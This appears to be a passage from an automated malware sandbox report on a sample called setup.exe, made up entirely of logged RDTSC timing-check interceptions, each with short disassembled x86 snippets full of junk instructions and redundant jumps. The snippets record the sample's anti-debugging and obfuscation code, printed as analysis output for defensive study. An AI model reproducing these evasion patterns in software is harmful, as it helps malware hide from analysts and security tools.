                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E633E7 second address: E633FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF32CDD656Bh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E633FC second address: E6343A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF32CFB7209h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jng 00007FF32CFB71FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6343A second address: E63451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF32CDD6570h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E63451 second address: E63484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FF32CFB7200h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CFB7203h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E63484 second address: E6349C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E648C4 second address: E648E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: DF22DD second address: DF22E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6CEEE second address: E6CEF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6DA5C second address: E6DA62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6DA62 second address: E6DAA9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF32CFB71F8h 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FF32CFB71FAh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a jmp 00007FF32CFB7206h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6DAA9 second address: E6DAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E72849 second address: E7284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7284F second address: E7286F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: DFA8C5 second address: DFA8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: DFA8D0 second address: DFA8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: DFA8D4 second address: DFA8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: DFA8DA second address: DFA8DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3CE6A second address: E3CE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3CE6E second address: E1FA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF32CDD6568h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D3504h] 0x0000002a lea eax, dword ptr [ebp+12481B8Bh] 0x00000030 xor edx, dword ptr [ebp+122D35A0h] 0x00000036 mov di, 14FDh 0x0000003a nop 0x0000003b jmp 00007FF32CDD6572h 0x00000040 push eax 0x00000041 ja 00007FF32CDD656Ah 0x00000047 push esi 0x00000048 pushad 0x00000049 popad 0x0000004a pop esi 0x0000004b nop 0x0000004c clc 0x0000004d call dword ptr [ebp+122D2BBFh] 0x00000053 push edi 0x00000054 jmp 00007FF32CDD6570h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3CF65 second address: E3CF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D303 second address: E3D309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D309 second address: E3D30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D3A5 second address: E3D3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF32CDD6566h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D558 second address: E3D574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D6C8 second address: E3D6CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D6CD second address: E3D6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FF32CFB71FEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 jg 00007FF32CFB71FCh 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D8EF second address: E3D8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D8F3 second address: E3D8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D8F7 second address: E3D8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D8FD second address: E3D903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D903 second address: E3D915 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF32CDD6566h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3D915 second address: E3D95E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FF32CFB71F8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000004h 0x00000028 mov cl, 70h 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FF32CFB7202h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3DD0F second address: E3DD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF32CDD6566h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3DD19 second address: E3DD4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 0000001Eh 0x00000010 sub dword ptr [ebp+122D32D8h], ecx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CFB7201h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E72042 second address: E72051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7729E second address: E772BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E772BD second address: E772DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FF32CDD6574h 0x0000000b jo 00007FF32CDD6566h 0x00000011 pop ebx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E772DE second address: E772E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77EEC second address: E77EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77EF0 second address: E77EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77EF4 second address: E77EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77EFA second address: E77F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77F00 second address: E77F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E780A1 second address: E780AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E780AF second address: E780B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E780B5 second address: E780B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E780B9 second address: E780D3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF32CDD656Bh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E780D3 second address: E780EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnc 00007FF32CFB71F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7853D second address: E78550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E78550 second address: E7858B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF32CFB7200h 0x00000012 jne 00007FF32CFB7208h 0x00000018 jmp 00007FF32CFB7202h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7B8CA second address: E7B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E829ED second address: E82A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E82A04 second address: E82A10 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF32CDD656Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E82A10 second address: E82A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E82A18 second address: E82A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E82A1E second address: E82A28 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF32CFB71F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8145C second address: E81477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6575h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81739 second address: E8173D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81CE2 second address: E81CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81CE8 second address: E81CF8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF32CFB71F6h 0x00000008 js 00007FF32CFB71F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81FC0 second address: E81FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81FCF second address: E81FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF32CFB71FEh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E82416 second address: E8241A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8241A second address: E8243A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7207h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8243A second address: E82440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8118A second address: E811A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7202h 0x00000007 jnp 00007FF32CFB71F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E811A6 second address: E811C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6576h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8A458 second address: E8A45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E89D1D second address: E89D52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF32CDD656Ch 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E89D52 second address: E89D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E89E84 second address: E89EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF32CDD6574h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF32CDD6574h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jbe 00007FF32CDD6566h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E89EBE second address: E89EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E89EC4 second address: E89EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF32CDD6576h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8A03A second address: E8A040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8A040 second address: E8A051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF32CDD6566h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8A051 second address: E8A055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8CB32 second address: E8CB51 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF32CDD6566h 0x00000008 jg 00007FF32CDD6566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FF32CDD656Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8CB51 second address: E8CB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8CB58 second address: E8CB74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD656Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FF32CDD6568h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E93115 second address: E9311F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9311F second address: E93128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E93558 second address: E93581 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 jmp 00007FF32CFB7206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007FF32CFB71F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E936B4 second address: E936BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3DBB0 second address: E3DC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007FF32CFB720Dh 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FF32CFB71F8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b movsx ecx, cx 0x0000002e push 00000004h 0x00000030 mov edi, dword ptr [ebp+122D3394h] 0x00000036 nop 0x00000037 push edi 0x00000038 jmp 00007FF32CFB7201h 0x0000003d pop edi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CFB7203h 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3DC30 second address: E3DC36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E93959 second address: E93963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF32CFB71F6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E93963 second address: E93983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF32CDD6570h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FF32CDD6566h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E93983 second address: E93997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jnp 00007FF32CFB71F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E97E38 second address: E97E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E97E3C second address: E97E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF32CFB7201h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 jmp 00007FF32CFB71FAh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 jno 00007FF32CFB71F6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
